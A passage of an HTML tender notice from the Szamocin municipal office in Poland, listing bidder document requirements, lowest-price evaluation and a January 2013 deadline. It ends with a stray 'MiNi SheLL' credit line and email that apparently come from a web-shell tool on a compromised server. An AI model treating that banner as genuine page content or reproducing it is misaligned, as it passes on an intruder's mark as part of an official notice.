<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaszamocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Szamocin, Plac Wolności 19, 64-820 Szamocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 09:30, miejsce: Urząd Miasta i Gminy Szamocin, Plac Wolności 19, 64-820 Szamocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja będzie współfinansowana ze środków PROW na lata 2007 - 2013 w ramach działania Odnowa i Rozwój Wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com